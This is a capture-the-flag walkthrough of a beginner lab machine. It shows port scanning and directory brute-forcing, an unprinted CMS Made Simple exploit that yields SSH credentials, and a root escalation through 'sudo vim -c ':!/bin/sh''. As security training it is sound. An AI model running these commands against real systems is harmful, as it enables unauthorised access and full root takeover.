Simple CTF

Beginner level ctf

Scanning

Nmap Scan

root@ip-10-10-34-190:~# nmap -sV -sC -T4 10.10.96.198

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-25 15:02 BST
Nmap scan report for ip-10-10-96-198.eu-west-1.compute.internal (10.10.96.198)
Host is up (0.015s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.34.190
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (EdDSA)
MAC Address: 02:0E:DA:80:35:9B (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.70 seconds

Enumeration

Directory Busting

root@ip-10-10-34-190:~# gobuster dir -u http://10.10.96.198/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.96.198/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/09/25 15:03:49 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
===============================================================
2021/09/25 15:04:13 Finished
===============================================================

simple Directory

searching for version

Find exploit

CMS Made Simple version 2.2.8 Exploit

Initial Access

run exploit

credentials mitch:secret

root@ip-10-10-34-190:~# ssh mitch@10.10.96.198 -p 2222
mitch@10.10.96.198's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ whoami
mitch
$

User Shell

Privilege Escalation

Sudo

we can run vim with sudo privilege

check GTFOBins

mitch@Machine:~$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
mitch@Machine:~$ sudo vim -c ':!/bin/sh'








                                                                         VIM - Vi IMproved

                                                                          version 7.4.1689
                                                                      by Bram Moolenaar et al.
                                                      Modified by pkg-vim-maintainers@lists.alioth.debian.org
                                                            Vim is open source and freely distributable

                                                                   Become a registered Vim user!
                                                           type  :help register<Enter>   for information

                                                           type  :q<Enter>               to exit
                                                           type  :help<Enter>  or  <F1>  for on-line help
                                                           type  :help version7<Enter>   for version info# 
# id
uid=0(root) gid=0(root) groups=0(root)

Root Shell

PreviousLinux Boxes NextBasic Pentesting

Last updated 4 years ago